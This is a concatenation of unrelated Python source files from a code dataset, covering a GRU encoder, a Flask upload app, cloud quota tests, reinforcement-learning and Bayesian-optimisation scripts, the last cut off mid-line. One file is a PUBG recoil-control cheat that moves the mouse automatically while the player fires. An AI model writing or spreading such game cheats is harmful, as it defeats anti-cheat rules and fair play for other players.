self.bidirectional = bidirectional\n self.n_layer = n_layers\n self.hidden_size = hidden_size\n # self.embed = nn.Embedding(input_size, embed_size)\n self.rnn = nn.GRU(\n embed_size, \n hidden_size, \n num_layers=n_layers, \n dropout=(0 if n_layers == 1 else dropout),\n bidirectional=bidirectional)\n self.times = n_layers*2 if bidirectional else n_layers\n self.hidden_project = nn.Linear(self.times*hidden_size, hidden_size)\n self.init_weight()\n\n def init_weight(self):\n init.xavier_normal_(self.rnn.weight_hh_l0)\n init.xavier_normal_(self.rnn.weight_ih_l0)\n self.rnn.bias_ih_l0.data.fill_(0.0)\n self.rnn.bias_hh_l0.data.fill_(0.0)\n\n def forward(self, src, src_l):\n # src: [seq, batch, embed]\n embed = nn.utils.rnn.pack_padded_sequence(src, src_l, enforce_sorted=False)\n output, hidden = self.rnn(embed)\n output, _ = nn.utils.rnn.pad_packed_sequence(output)\n\n # output: [seq, batch, hidden * bidirectional]\n # hidden: [n_layer * bidirectional, batch, hidden]\n if self.bidirectional:\n output = output[:, :, :self.hidden_size] + output[:, :, self.hidden_size:]\n hidden = hidden.permute(1, 2, 0) # [batch, hidden, n_layer * bidirectional]\n hidden = hidden.reshape(hidden.shape[0], -1) # [batch, hidden*...]\n hidden = torch.tanh(self.hidden_project(hidden)) # [batch, hidden]\n return output, hidden\n","sub_path":"models/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"595985473","text":"# -*- coding: utf-8 -*-\r\n\r\nimport sys\r\nimport time\r\nfrom threading import Thread\r\nfrom concurrent.futures import ThreadPoolExecutor\r\n\r\nfrom pynput import mouse, keyboard\r\n\r\nfrom .log import logger\r\nfrom .config import GUN\r\nfrom .models import GunType\r\n\r\n\r\nclass PUBG(object):\r\n\tdef __init__(self):\r\n\t\tself.on = False\r\n\t\tself.shooting = False\r\n\t\tself.gun = GunType(GUN)\r\n\t\tself.mouse = mouse.Controller()\r\n\t\tself.keyborad = keyboard.Controller()\r\n\t\tself.banner()\r\n\r\n\tdef banner(self):\r\n\t\tlogger.info('Status: OFF')\r\n\t\tlogger.info('Press F5 to start/stop the listening.')\r\n\t\tlogger.info('Now you are using {}'.format(self.gun.name))\r\n\r\n\tdef start(self):\r\n\t\twith ThreadPoolExecutor(max_workers=5) as executor:\r\n\t\t\texecutor.submit(self.mouse_listener)\r\n\t\t\texecutor.submit(self.keyboard_listener)\r\n\t\t\texecutor.submit(self.moving)\r\n\r\n\t# Monitoring the mouse\r\n\tdef on_move(self, x, y):\r\n\t\t# logger.debug('Pointer moved to {0}'.format((x, y)))\r\n\t\tpass\r\n\r\n\tdef on_click(self, x, y, button, pressed):\r\n\t\tlogger.debug('{0} at {1}'.format('Pressed' if pressed else 'Released', (x, y)))\r\n\t\tif self.on and button == mouse.Button.left:\r\n\t\t\tself.shooting = pressed\r\n\r\n\r\n\tdef on_scroll(self, x, y, dx, dy):\r\n\t\tlogger.debug('Scrolled {0} at {1}'.format('down' if dy < 0 else 'up', (x, y)))\r\n\t\t\r\n\t# Monitoring the keyboard\r\n\tdef on_press(self, key):\r\n\t\ttry:\r\n\t\t\tlogger.debug('alphanumeric key {0} pressed'.format(key.char))\r\n\t\texcept KeyboardInterrupt:\r\n\t\t\tsys.exit(0)\r\n\t\texcept AttributeError:\r\n\t\t\tlogger.debug('special key {0} pressed'.format(key))\r\n\r\n\t\tif key == keyboard.Key.f5:\r\n\t\t\tself.on = not self.on\r\n\t\t\tif self.on:\r\n\t\t\t\tlogger.info('Status: ON')\r\n\t\t\telse:\r\n\t\t\t\tlogger.info('Status: OFF')\r\n\r\n\tdef on_release(self, key):\r\n\t\tlogger.debug('{0} released'.format(key))\r\n\r\n\t# listening\r\n\tdef mouse_listener(self):\r\n\t\twith mouse.Listener(on_move=self.on_move, \r\n\t\t\t\t\t\t\ton_click=self.on_click, \r\n\t\t\t\t\t\t\ton_scroll=self.on_scroll) as listener:\r\n\t\t\tlistener.join()\r\n\r\n\tdef keyboard_listener(self):\r\n\t\twith keyboard.Listener(on_press=self.on_press, \r\n\t\t\t\t\t\t\t on_release=self.on_release) as listener:\r\n\t\t\tlistener.join()\r\n\r\n\r\n\t# Mouse Cheating track\r\n\tdef moving(self):\r\n\t\twhile True:\r\n\t\t\tif self.on and self.shooting:\r\n\t\t\t\tself.mouse.move(0 ,self.gun.delta)\r\n\t\t\t\tprint('move move move move')\r\n\t\t\t\ttime.sleep(self.gun.cd)\r\n\t\t\t\tself.gun.init()\r\n\t\t\t\r\n\t\t\t\r\n","sub_path":"pubg/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"7705574","text":"\"\"\"\nThe setup file for chilidoc\n\"\"\"\n\nfrom setuptools import setup, find_packages\nfrom codecs import open\nfrom os import path\n\nhere = path.abspath(path.dirname(__file__))\n\n# Get the long description from the README file\nwith open(path.join(here, 'README.rst'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name=\"chilidoc\",\n version=\"1.0.0\",\n description=\"Simple AsciiDoc style typesetting language converter\",\n long_description=long_description,\n url=\"https://github.com/EthanDayley/chilidoc.git\",\n author=\"Ethan Dayley\",\n classifiers=[\n \"Development Status :: 3 - Alpha\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python :: 3\"\n ],\n keywords=\"markdown language typeset html converter\",\n packages=[\"chilidoc\"],\n zip_safe=False\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"399085160","text":"\"\"\"\nThis is a boilerplate-skipping wrapper for myradex h13cn.\n\nIt's not very gerneralizable.\n\n\"\"\"\n\nfrom __future__ import division\nimport wrapper_my_radex\nwrapper = wrapper_my_radex.myradex_wrapper\nfrom myradex_table_function import table_from_myradex_datatransitions\n\nn_levels, n_item, n_transitions = wrapper.config_basic(\n '/Users/tsrice/Documents/Academia/Misc_Software/Radex/data/',\n 'h13cn@xpol.dat', 2.7, True)\n\ndefault_params = {\n 'tkin': None,\n 'dv_cgs': 1e5, # What is this? oh, it's delta v in cm/scp\n 'dens_x_cgs': 1e-2, # I think this is not a relevant parameter?\n 'ncol_x_cgs': None,\n 'h2_density_cgs': None,\n 'hi_density_cgs': 0.0,\n 'oh2_density_cgs': 0.0,\n 'ph2_density_cgs': 0.0,\n 'hii_density_cgs': 0.0,\n 'electron_density_cgs': 0.0,\n 'n_levels': n_levels,\n 'n_item': n_item,\n 'n_transitions': n_transitions,\n 'geotype': 'lvg'}\n\n# How do we pass in that dict of default params but update specific items if necessary?\ndef myradex_h13cn(kinetic_temperature=None, collider_density=None, column_density=None):\n\n params = default_params.copy()\n\n params['tkin'] = kinetic_temperature\n params['ncol_x_cgs'] = column_density\n params['h2_density_cgs'] = collider_density\n\n # load the stuff from the molecular data file\n\n output_dict = {}\n (output_dict['energies'], \n output_dict['f_occupations'], \n output_dict['data_transitions'], \n output_dict['cooling_rate']) = wrapper.run_one_params(**params)\n output_dict['table'] = table_from_myradex_datatransitions(output_dict['data_transitions'])\n\n return output_dict\n","sub_path":"h13cn_myradex_interface.py","file_name":"h13cn_myradex_interface.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"347986463","text":"# Copyright The Cloud Custodian Authors.\n# SPDX-License-Identifier: Apache-2.0\n#\n\n\nfrom c7n.utils import local_session, yaml_load\n\nfrom .common import BaseTest\n\n\nclass TestQuotas(BaseTest):\n def test_service_quota_request_history_filter(self):\n session_factory = self.replay_flight_data('test_service_quota')\n policy = yaml_load(\"\"\"\n name: service-quota-history-filter\n resource: aws.service-quota\n filters:\n - type: request-history\n key: \"[].Status\"\n value: CASE_CLOSED\n op: in\n value_type: swap\n \"\"\")\n p = self.load_policy(\n policy,\n session_factory=session_factory\n )\n resources = p.run()\n self.assertTrue(resources)\n\n def test_service_quota_request_increase(self):\n session_factory = self.replay_flight_data('test_service_quota')\n policy = yaml_load(\"\"\"\n name: service-quota-request-increase\n resource: aws.service-quota\n filters:\n - QuotaCode: L-355B2B67\n actions:\n - type: request-increase\n multiplier: 1.2\n \"\"\")\n p = self.load_policy(policy, session_factory=session_factory)\n resources = p.run()\n self.assertEqual(len(resources), 1)\n client = local_session(session_factory).client('service-quotas')\n changes = client.list_requested_service_quota_change_history_by_quota(\n ServiceCode=resources[0]['ServiceCode'],\n QuotaCode=resources[0]['QuotaCode']\n )['RequestedQuotas']\n self.assertTrue(changes)\n\n def test_usage_metric_filter(self):\n session_factory = self.replay_flight_data('test_service_quota')\n policy = yaml_load(\"\"\"\n name: service-quota-usage-metric\n resource: aws.service-quota\n filters:\n - UsageMetric: present\n - type: usage-metric\n limit: 20\n \"\"\")\n p = self.load_policy(policy, session_factory=session_factory)\n resources = p.run()\n self.assertEqual(len(resources), 1)\n","sub_path":"tests/test_quotas.py","file_name":"test_quotas.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"347581870","text":"from flask import Flask, render_template, request, send_from_directory, redirect, url_for\n\n\nUPLOAD_FOLDER = '/presentations'\n\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n\n@app.route('/', methods=['POST', 'GET'])\n@app.route('/start', methods=['POST', 'GET'])\ndef start():\n return render_template(\"start.html\")\n\n\n@app.route('/pattern', methods=['POST', 'GET'])\ndef pattern():\n if request.method == 'POST':\n if request.form.get('1') == \"1\":\n return send_from_directory(directory=\"presentations\", filename=\"algebra.pptx\", as_attachment=True)\n if request.form.get('2') == \"2\":\n return send_from_directory(directory=\"presentations\", filename=\"Russian.pptx\", as_attachment=True)\n if request.form.get('3') == \"3\":\n return send_from_directory(directory=\"presentations\", filename=\"chemistry.pptx\", as_attachment=True)\n return render_template(\"pattern.html\")\n\n\n@app.route('/check', methods=['POST', 'GET'])\ndef check():\n if request.method == 'POST':\n file = request.files['file']\n file.save(\"files/\" + file.filename)\n return redirect(\"/response/\" + file.filename)\n return render_template(\"check.html\")\n\n@app.route('/response/', methods=['POST', 'GET'])\ndef response(file):\n if file == \"kreativnost.pptx\":\n return render_template(\"response.html\")\n elif file == \"PUSK.pptx\":\n return render_template(\"response2.html\")\n return redirect(\"/check\")\n\n\n@app.route('/recommendation', methods=['POST', 'GET'])\ndef recommendation():\n return render_template(\"recommendation.html\")\n\n\nif __name__ == '__main__':\n app.run(port=8080, host='127.0.0.1')\n","sub_path":"PUSK.py","file_name":"PUSK.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"36397003","text":"from collections import defaultdict\nimport utils\n\n\nclass Agent:\n def __init__(self, game):\n self.game = game\n\n @staticmethod\n def greedy_pick(action_value_dict, find_one=True, thresh=0):\n if find_one: # find one argmaxizer\n return max(action_value_dict, key=action_value_dict.get)\n else:\n best_score = -float('inf')\n best_actions = []\n for action, value in action_value_dict.items():\n flag = utils.compare(value, best_score, thresh)\n if flag is 1: # a strictly better action is found\n best_score = value\n best_actions = [action]\n elif flag is 0: # an action which ties the best action is found\n best_actions.append(action)\n return best_actions\n\n def policy_run(self, policy, *reset_args):\n state = self.game.reset(*reset_args)\n state_ls = []\n reward_ls = []\n is_terminal = False\n while not is_terminal:\n state_ls.append(state)\n action = policy[state]\n state, reward, is_terminal = self.game.one_move(action)\n reward_ls.append(reward)\n return state_ls, reward_ls\n\n def policy_eval_on(self, policy, n_episodes=10 ** 5):\n \"\"\"Using Monte-Carlo to evaluate a given policy.\n :param policy (dict) -- only consider deterministic policy, action = policy[state]\n \"\"\"\n value_fun = {state: utils.Averager() for state in policy}\n for i in range(n_episodes):\n state_ls, reward_ls = self.policy_run(policy)\n v = 0\n for s, r in zip(reversed(state_ls), reversed(reward_ls)):\n v = self.game.gamma * v + r\n value_fun[s].add_new(v)\n return value_fun\n\n def policy_eval_off(self, policy):\n pass\n","sub_path":"tabular_learning/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"238877865","text":"## Ejercicio 78\r\n# Escriba un programa que convierta un numero decimal (base 10) que inserte un usuario como numero entero\r\n# y después use el algoritmo de división mostrado para realizar la conversión. \r\n#Cuando el algoritmo se complete el resultado deberá contener la representación del numero en binario. \r\n# Después se deberá desplegar el resultado con el mensaje apropiado.\r\n# Sea resultado una variable string vacía.\r\n# Sea “q” un numero entero a convertir\r\n# Repetir:\r\n # Sea “r” igual al residuo cuando “q” es dividido entre 2.\r\n # Convertir “r” a string y agregándolo al comienzo de resultado\r\n # Dividir “q” entre 2 , eliminar cualquier residuo y guardar el resultado de nuevo en “q”\r\n# Hasta que “q” sea cero\r\n\r\nresultado = ''\r\nq = int(input('Inserta el numero: '))\r\n\r\n\r\nr = q % 2\r\n\r\nresultado = str(r) + resultado\r\nq = q // 2\r\n\r\n\r\nwhile q > 0:\r\n r = q % 2\r\n resultado = str(r) + resultado\r\n q = q // 2 \r\n\r\nprint('binaro', resultado)\r\n\r\n","sub_path":"78.py","file_name":"78.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"112337598","text":"# Author: Ryan-Rhys Griffiths\n\"\"\"\nThis module contains the code for heteroscedastic Bayesian Optimisation on the Freesolv dataset.\n\"\"\"\n\nimport argparse\nimport os\nimport sys\nimport warnings\n\nfrom matplotlib import pyplot as plt\nfrom matplotlib.ticker import MaxNLocator\nimport numpy as np\nfrom sklearn.decomposition import PCA\nfrom sklearn.model_selection import train_test_split\n\nsys.path.append('../')\nsys.path.append('../..')\nsys.path.append('../../..')\n\nfrom data_utils import parse_dataset\nfrom acquisition_funcs.acquisition_functions import heteroscedastic_expected_improvement, heteroscedastic_propose_location, \\\n my_propose_location, my_expected_improvement, augmented_expected_improvement, heteroscedastic_augmented_expected_improvement\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\n\ndef main(penalty, aleatoric_weight, random_trials, bayes_opt_iters, init_set_size, n_components, path):\n \"\"\"\n Script for running the soil phosphorus fraction optimisation experiment.\n\n param: penalty: $\\alpha$ parameter specifying weight of noise component to objective\n param: aleatoric_weight: float specifying the value of $\\beta of ANPEI\n param: random_trials: int specifying the number of random initialisations\n param: bayes_opt_iters: int specifying the number of iterations of BayesOpt\n param: init_set_size: int specifying the side length of the 2D grid to initialise on.\n param: n_components: int specifying the number of PCA principle components to keep.\n param: path: str specifying the path to the Freesolv.txt file.\n \"\"\"\n\n task = 'FreeSolv'\n use_frag = True\n use_exp = True # use experimental values.\n\n xs, ys, std = parse_dataset(task, path, use_frag, use_exp)\n\n warnings.filterwarnings('ignore')\n\n # Number of iterations\n bayes_opt_iters = 10\n random_trials = 50\n\n # We perform random trials of Bayesian Optimisation\n\n rand_running_sum = np.zeros(bayes_opt_iters)\n rand_squares = np.zeros(bayes_opt_iters)\n homo_running_sum = np.zeros(bayes_opt_iters)\n homo_squares = np.zeros(bayes_opt_iters) # Following the single-pass estimator given on pg. 192 of mathematics for machine learning\n hetero_running_sum = np.zeros(bayes_opt_iters)\n hetero_squares = np.zeros(bayes_opt_iters)\n aug_running_sum = np.zeros(bayes_opt_iters)\n aug_squares = np.zeros(bayes_opt_iters)\n aug_het_running_sum = np.zeros(bayes_opt_iters)\n aug_het_squares = np.zeros(bayes_opt_iters)\n\n # We compute the objective corresponding to aleatoric noise only\n\n rand_noise_running_sum = np.zeros(bayes_opt_iters)\n rand_noise_squares = np.zeros(bayes_opt_iters)\n homo_noise_running_sum = np.zeros(bayes_opt_iters)\n homo_noise_squares = np.zeros(bayes_opt_iters) # Following the single-pass estimator given on pg. 192 of mathematics for machine learning\n hetero_noise_running_sum = np.zeros(bayes_opt_iters)\n hetero_noise_squares = np.zeros(bayes_opt_iters)\n aug_noise_running_sum = np.zeros(bayes_opt_iters)\n aug_noise_squares = np.zeros(bayes_opt_iters)\n aug_het_noise_running_sum = np.zeros(bayes_opt_iters)\n aug_het_noise_squares = np.zeros(bayes_opt_iters)\n\n for i in range(random_trials):\n\n start_seed = 47\n numpy_seed = i + start_seed # set to avoid segfault issue\n # ('Process finished with exit code 139 (interrupted by signal 11: SIGSEGV)') when i = 0\n\n # test in this instance is the initialisation set for Bayesian Optimisation and train is the heldout set.\n\n xs_train, xs_test, ys_train, ys_test = train_test_split(xs, ys, test_size=init_set_size, random_state=numpy_seed, shuffle=True)\n\n pca = PCA(n_components)\n xs_test = pca.fit_transform(xs_test)\n print('Fraction of variance retained is: ' + str(sum(pca.explained_variance_ratio_)))\n xs_train = pca.transform(xs_train)\n\n _, _, std_train, std_test = train_test_split(xs, std, test_size=init_set_size, random_state=numpy_seed, shuffle=True)\n\n ys_train = ys_train.reshape(-1, 1)\n ys_test = ys_test.reshape(-1, 1)\n\n init_num_samples = len(ys_test)\n\n bounds = np.array([np.array([np.min(xs_train[:, i]), np.max(xs_train[:, i])]) for i in range(xs_train.shape[1])])\n\n # Can only plot in 2D\n\n if n_components == 2:\n x1_star = np.arange(np.min(xs_train[:, 0]), np.max(xs_train[:, 0]), 0.2)\n x2_star = np.arange(np.min(xs_train[:, 1]), np.max(xs_train[:, 1]), 0.2)\n plot_sample = np.array(np.meshgrid(x1_star, x2_star)).T.reshape(-1, 2) # Where 2 gives the dimensionality\n else:\n plot_sample = None\n\n X_init = xs_test\n Y_init = ys_test\n\n # Initialize samples\n homo_X_sample = X_init\n homo_Y_sample = Y_init\n het_X_sample = X_init\n het_Y_sample = Y_init\n aug_X_sample = X_init\n aug_Y_sample = Y_init\n aug_het_X_sample = X_init\n aug_het_Y_sample = Y_init\n\n # initial GP hypers\n\n l_init = 1.0\n sigma_f_init = 1.0\n noise = 1.0\n l_noise_init = 1.0\n sigma_f_noise_init = 1.0\n gp2_noise = 1.0\n num_iters = 10\n sample_size = 100\n\n rand_best_so_far = 300\n homo_best_so_far = 300 # value to beat\n het_best_so_far = 300\n aug_best_so_far = 300\n aug_het_best_so_far = 300\n rand_noise_best_so_far = 300\n homo_noise_best_so_far = 300 # value to beat\n het_noise_best_so_far = 300\n aug_noise_best_so_far = 300\n aug_het_noise_best_so_far = 300\n rand_obj_val_list = []\n homo_obj_val_list = []\n het_obj_val_list = []\n aug_obj_val_list = []\n aug_het_obj_val_list = []\n rand_noise_val_list = []\n homo_noise_val_list = []\n het_noise_val_list = []\n aug_noise_val_list = []\n aug_het_noise_val_list = []\n rand_collected_x = []\n homo_collected_x = []\n het_collected_x = []\n aug_collected_x = []\n aug_het_collected_x = []\n\n for j in range(bayes_opt_iters):\n\n print(j)\n\n # take random point from uniform distribution\n rand_X_next = np.random.uniform(np.min(xs_train, axis=0), np.max(xs_train, axis=0)) # this just takes X not the sin function itself\n # Obtain next noisy sample from the objective function\n rand_X_next = min(xs_train, key=lambda x: np.linalg.norm(x - rand_X_next)) # Closest point in the heldout set.\n rand_index = list(xs_train[:, 0]).index(rand_X_next[0]) # index by first dimension\n rand_Y_next = ys_train[rand_index]\n rand_composite_obj_val = rand_Y_next + penalty*std_train[rand_index]\n rand_noise_val = std_train[rand_index]\n rand_collected_x.append(rand_X_next)\n\n # check if random point's Y value is better than best so far\n if rand_composite_obj_val < rand_best_so_far:\n rand_best_so_far = rand_composite_obj_val\n rand_obj_val_list.append(rand_composite_obj_val)\n else:\n rand_obj_val_list.append(rand_best_so_far)\n # if yes, save it, if no, save best so far into list of best y-value per iteration in rand_composite_obj_val\n\n if rand_noise_val < rand_noise_best_so_far:\n rand_noise_best_so_far = rand_noise_val\n rand_noise_val_list.append(rand_noise_val)\n else:\n rand_noise_val_list.append(rand_noise_best_so_far)\n\n # Obtain next sampling point from the acquisition function (expected_improvement)\n\n homo_X_next = my_propose_location(my_expected_improvement, homo_X_sample, homo_Y_sample, noise, l_init, sigma_f_init,\n bounds, plot_sample, n_restarts=3, min_val=300)\n\n homo_collected_x.append(homo_X_next)\n\n # Obtain next noisy sample from the objective function\n homo_X_next = min(xs_train, key=lambda x: np.linalg.norm(x - homo_X_next)) # Closest point in the heldout set.\n homo_index = list(xs_train[:, 0]).index(homo_X_next[0]) # index by first dimension\n homo_Y_next = ys_train[homo_index]\n homo_composite_obj_val = homo_Y_next + penalty*std_train[homo_index]\n homo_noise_val = std_train[homo_index]\n homo_collected_x.append(homo_X_next)\n\n if homo_composite_obj_val < homo_best_so_far:\n homo_best_so_far = homo_composite_obj_val\n homo_obj_val_list.append(homo_composite_obj_val)\n else:\n homo_obj_val_list.append(homo_best_so_far)\n\n if homo_noise_val < homo_noise_best_so_far:\n homo_noise_best_so_far = homo_noise_val\n homo_noise_val_list.append(homo_noise_val)\n else:\n homo_noise_val_list.append(homo_noise_best_so_far)\n\n # Add sample to previous samples\n homo_X_sample = np.vstack((homo_X_sample, homo_X_next))\n homo_Y_sample = np.vstack((homo_Y_sample, homo_Y_next))\n\n # Obtain next sampling point from the het acquisition function (ANPEI)\n\n het_X_next = heteroscedastic_propose_location(heteroscedastic_expected_improvement, het_X_sample,\n het_Y_sample, noise, l_init, sigma_f_init, l_noise_init,\n sigma_f_noise_init, gp2_noise, num_iters, sample_size, bounds,\n plot_sample, n_restarts=3, min_val=300, aleatoric_weight=aleatoric_weight)\n\n het_collected_x.append(het_X_next)\n\n # Obtain next noisy sample from the objective function\n het_X_next = min(xs_train, key=lambda x: np.linalg.norm(x - het_X_next))\n het_index = list(xs_train[:, 0]).index(het_X_next[0])\n het_Y_next = ys_train[het_index]\n het_composite_obj_val = het_Y_next + penalty*std_train[het_index]\n het_noise_val = std_train[het_index]\n het_collected_x.append(het_X_next)\n\n if het_composite_obj_val < het_best_so_far:\n het_best_so_far = het_composite_obj_val\n het_obj_val_list.append(het_composite_obj_val)\n else:\n het_obj_val_list.append(het_best_so_far)\n\n if het_noise_val < het_noise_best_so_far:\n het_noise_best_so_far = het_noise_val\n het_noise_val_list.append(het_noise_val)\n else:\n het_noise_val_list.append(het_noise_best_so_far)\n\n # Add sample to previous samples\n het_X_sample = np.vstack((het_X_sample, het_X_next))\n het_Y_sample = np.vstack((het_Y_sample, het_Y_next))\n\n # Obtain next sampling point from the augmented expected improvement (AEI)\n\n aug_X_next = my_propose_location(augmented_expected_improvement, aug_X_sample, aug_Y_sample, noise, l_init, sigma_f_init,\n bounds, plot_sample, n_restarts=3, min_val=300, aleatoric_weight=aleatoric_weight, aei=True)\n\n aug_collected_x.append(aug_X_next)\n\n # Obtain next noisy sample from the objective function\n aug_X_next = min(xs_train, key=lambda x: np.linalg.norm(x - aug_X_next))\n aug_index = list(xs_train[:, 0]).index(aug_X_next[0])\n aug_Y_next = ys_train[aug_index]\n aug_composite_obj_val = aug_Y_next + penalty*std_train[aug_index]\n aug_noise_val = std_train[aug_index]\n aug_collected_x.append(het_X_next)\n\n if aug_composite_obj_val < aug_best_so_far:\n aug_best_so_far = aug_composite_obj_val\n aug_obj_val_list.append(aug_composite_obj_val)\n else:\n aug_obj_val_list.append(aug_best_so_far)\n\n if aug_noise_val < aug_noise_best_so_far:\n aug_noise_best_so_far = aug_noise_val\n aug_noise_val_list.append(aug_noise_val)\n else:\n aug_noise_val_list.append(aug_noise_best_so_far)\n\n # Add sample to previous sample\n aug_X_sample = np.vstack((aug_X_sample, aug_X_next))\n aug_Y_sample = np.vstack((aug_Y_sample, aug_Y_next))\n\n # Obtain next sampling point from the heteroscedastic augmented expected improvement (het-AEI)\n\n aug_het_X_next = heteroscedastic_propose_location(heteroscedastic_augmented_expected_improvement, aug_het_X_sample,\n aug_het_Y_sample, noise, l_init, sigma_f_init, l_noise_init,\n sigma_f_noise_init, gp2_noise, num_iters, sample_size, bounds,\n plot_sample, n_restarts=3, min_val=300, aleatoric_weight=aleatoric_weight)\n\n aug_het_collected_x.append(aug_het_X_next)\n\n # Obtain next noisy sample from the objective function\n aug_het_X_next = min(xs_train, key=lambda x: np.linalg.norm(x - aug_het_X_next))\n aug_het_index = list(xs_train[:, 0]).index(aug_het_X_next[0])\n aug_het_Y_next = ys_train[aug_het_index]\n aug_het_composite_obj_val = aug_het_Y_next + penalty*std_train[aug_het_index]\n aug_het_noise_val = std_train[aug_het_index]\n aug_het_collected_x.append(aug_het_X_next)\n\n if aug_het_composite_obj_val < aug_het_best_so_far:\n aug_het_best_so_far = aug_het_composite_obj_val\n aug_het_obj_val_list.append(aug_het_composite_obj_val)\n else:\n aug_het_obj_val_list.append(aug_het_best_so_far)\n\n if aug_het_noise_val < aug_het_noise_best_so_far:\n aug_het_noise_best_so_far = aug_het_noise_val\n aug_het_noise_val_list.append(aug_het_noise_val)\n else:\n aug_het_noise_val_list.append(aug_het_noise_best_so_far)\n\n # Add sample to previous sample\n aug_het_X_sample = np.vstack((aug_het_X_sample, aug_het_X_next))\n aug_het_Y_sample = np.vstack((aug_het_Y_sample, aug_het_Y_next))\n\n rand_running_sum += np.array(rand_obj_val_list, dtype=np.float64).flatten()\n rand_squares += np.array(rand_obj_val_list, dtype=np.float64).flatten() ** 2\n homo_running_sum += np.array(homo_obj_val_list, dtype=np.float64).flatten()\n homo_squares += np.array(homo_obj_val_list, dtype=np.float64).flatten() ** 2\n hetero_running_sum += np.array(het_obj_val_list, dtype=np.float64).flatten()\n hetero_squares += np.array(het_obj_val_list, dtype=np.float64).flatten() ** 2\n aug_running_sum += np.array(aug_obj_val_list, dtype=np.float64).flatten()\n aug_squares += np.array(aug_obj_val_list, dtype=np.float64).flatten() ** 2\n aug_het_running_sum += np.array(aug_het_obj_val_list, dtype=np.float64).flatten()\n aug_het_squares += np.array(aug_het_obj_val_list, dtype=np.float64).flatten() ** 2\n\n rand_noise_running_sum += np.array(rand_noise_val_list, dtype=np.float64).flatten() # just the way to average out across all random trials\n rand_noise_squares += np.array(rand_noise_val_list, dtype=np.float64).flatten() ** 2 # likewise for errors\n homo_noise_running_sum += np.array(homo_noise_val_list, dtype=np.float64).flatten()\n homo_noise_squares += np.array(homo_noise_val_list, dtype=np.float64).flatten() ** 2\n hetero_noise_running_sum += np.array(het_noise_val_list, dtype=np.float64).flatten()\n hetero_noise_squares += np.array(het_noise_val_list, dtype=np.float64).flatten() ** 2\n aug_noise_running_sum += np.array(aug_noise_val_list, dtype=np.float64).flatten()\n aug_noise_squares += np.array(aug_noise_val_list, dtype=np.float64).flatten() ** 2\n aug_het_noise_running_sum += np.array(aug_het_noise_val_list, dtype=np.float64).flatten()\n aug_het_noise_squares += np.array(aug_het_noise_val_list, dtype=np.float64).flatten() ** 2\n\n print(f'trial {i} complete')\n\n if init_set_size == 0.2:\n\n seed_index = i + start_seed + 1\n\n np.savetxt(f'freesolv_data/02_pen_1/rand_means/rand_means_{start_seed}_{seed_index}.txt', rand_running_sum)\n np.savetxt(f'freesolv_data/02_pen_1/rand_means/rand_squares_{start_seed}_{seed_index}.txt', rand_squares)\n np.savetxt(f'freesolv_data/02_pen_1/homo_means/homo_means_{start_seed}_{seed_index}.txt', homo_running_sum)\n np.savetxt(f'freesolv_data/02_pen_1/homo_means/homo_squares_{start_seed}_{seed_index}.txt', homo_squares)\n np.savetxt(f'freesolv_data/02_pen_1/het_means/hetero_means_{start_seed}_{seed_index}.txt', hetero_running_sum)\n np.savetxt(f'freesolv_data/02_pen_1/het_means/hetero_squares_{start_seed}_{seed_index}.txt', hetero_squares)\n np.savetxt(f'freesolv_data/02_pen_1/aug_means/aug_means_{start_seed}_{seed_index}.txt', aug_running_sum)\n np.savetxt(f'freesolv_data/02_pen_1/aug_means/aug_squares_{start_seed}_{seed_index}.txt', aug_squares)\n np.savetxt(f'freesolv_data/02_pen_1/aug_het_means/aug_het_means_{start_seed}_{seed_index}.txt', aug_het_running_sum)\n np.savetxt(f'freesolv_data/02_pen_1/aug_het_means/aug_het_squares_{start_seed}_{seed_index}.txt', aug_het_squares)\n\n np.savetxt(f'freesolv_data/02_pen_1/rand_noise/rand_means_{start_seed}_{seed_index}.txt', rand_noise_running_sum)\n np.savetxt(f'freesolv_data/02_pen_1/rand_noise/rand_squares_{start_seed}_{seed_index}.txt', rand_noise_squares)\n np.savetxt(f'freesolv_data/02_pen_1/homo_noise/homo_means_{start_seed}_{seed_index}.txt', homo_noise_running_sum)\n np.savetxt(f'freesolv_data/02_pen_1/homo_noise/homo_squares_{start_seed}_{seed_index}.txt', homo_noise_squares)\n np.savetxt(f'freesolv_data/02_pen_1/het_noise/hetero_means_{start_seed}_{seed_index}.txt', hetero_noise_running_sum)\n np.savetxt(f'freesolv_data/02_pen_1/het_noise/hetero_squares_{start_seed}_{seed_index}.txt', hetero_noise_squares)\n np.savetxt(f'freesolv_data/02_pen_1/aug_noise/aug_means_{start_seed}_{seed_index}.txt', aug_noise_running_sum)\n np.savetxt(f'freesolv_data/02_pen_1/aug_noise/aug_squares_{start_seed}_{seed_index}.txt', aug_noise_squares)\n np.savetxt(f'freesolv_data/02_pen_1/aug_het_noise/aug_het_means_{start_seed}_{seed_index}.txt', aug_het_noise_running_sum)\n np.savetxt(f'freesolv_data/02_pen_1/aug_het_noise/aug_het_squares_{start_seed}_{seed_index}.txt', aug_het_noise_squares)\n\n rand_means = rand_running_sum / random_trials\n rand_errs = (np.sqrt(rand_squares / random_trials - rand_means **2))/np.sqrt(random_trials)\n homo_means = homo_running_sum / random_trials\n hetero_means = 